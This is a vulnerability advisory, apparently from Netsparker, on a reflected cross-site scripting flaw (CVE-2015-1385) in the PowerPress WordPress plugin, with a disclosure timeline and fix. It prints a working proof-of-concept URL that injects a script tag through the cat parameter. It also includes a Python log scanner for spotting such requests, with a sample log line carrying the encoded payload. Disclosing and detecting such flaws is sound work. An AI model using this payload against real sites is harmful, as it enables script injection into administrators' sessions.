Information
--------------------
Advisory by Netsparker.

Name: XSS Vulnerability in Blubrry PowerPress

Affected Software: Blubrry PowerPress

Affected Versions: 6.0 and possibly below

Vendor Homepage: https://wordpress.org/plugins/powerpress/

Vulnerability Type: Cross-site Scripting

Severity: Important

CVE-ID: CVE-2015-1385

Netsparker Advisory Reference: NS-15-001

Technical Details
--------------------

Proof of concept URL for the XSS in Blubrry PowerPress (the payload is appended to the value of the cat parameter):

/wp-admin/admin.php?page=powerpress/powerpressadmin_categoryfeeds.php&action=powerpress-editcategoryfeed&cat=1';"--></style></scRipt><scRipt>alert(0x014068)</scRipt>

For more information on cross-site scripting vulnerabilities, read the article Cross-site Scripting (XSS).
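
To check whether a site still on an affected version received requests like the proof of concept above, the following added example (not part of the original advisory or of the plugin's code) scans access log lines for the PowerPress category feed editor being called with a non-numeric cat value. The combined log format, the rule that a legitimate cat is a plain integer, and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Page and action values copied from the advisory's proof-of-concept URL.
PAGE = "powerpress/powerpressadmin_categoryfeeds.php"
ACTION = "powerpress-editcategoryfeed"
# Assumption: combined-format access log, client address first, request quoted.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_cat(url):
    """Return the decoded `cat` value when it is not a plain integer, else None."""
    parts = urlsplit(url)
    if not parts.path.endswith("/wp-admin/admin.php"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if PAGE not in params.get("page", []) or ACTION not in params.get("action", []):
        return None
    for value in params.get("cat", []):
        decoded = unquote(value)  # undo a second layer of percent-encoding
        # Assumption: a legitimate category id is a run of ASCII digits.
        if not re.fullmatch(r"[0-9]+", decoded):
            return decoded
    return None

def scan_log(lines):
    """Return (client, cat_value) for each request with a non-numeric `cat`."""
    hits = []
    for line in lines:
        match = LINE_RE.match(line)
        if match:
            value = suspicious_cat(match.group(2))
            if value is not None:
                hits.append((match.group(1), value))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
BASE = "/wp-admin/admin.php?page=" + PAGE + "&action=" + ACTION + "&cat="
SAMPLE_LOG = [
    '192.0.2.10 - - [29/Jan/2015:10:00:01 +0000] "GET ' + BASE + '12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/Jan/2015:10:02:13 +0000] "GET ' + BASE
    + '1%27%3B%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Ealert(0x014068)%3C%2FscRipt%3E HTTP/1.1" 200 5301',
    '203.0.113.5 - - [29/Jan/2015:10:05:40 +0000] "GET ' + BASE + '1%2527 HTTP/1.1" 200 5130',
    '192.0.2.10 - - [29/Jan/2015:10:06:02 +0000] "GET /wp-admin/admin.php?page=other-plugin&cat=abc HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, value in scan_log(SAMPLE_LOG):
        print(client, repr(value))
```

A hit only shows that such a request was logged; the page is under /wp-admin/, so whether the script ran depends on who followed the link.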

Advisory Timeline
--------------------
22/01/2015 - First Contact

26/01/2015 - Vulnerability fixed

29/01/2015 - Advisory released

Solution
--------------------
Download version 6.0.1, which includes a fix for this vulnerability.

Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.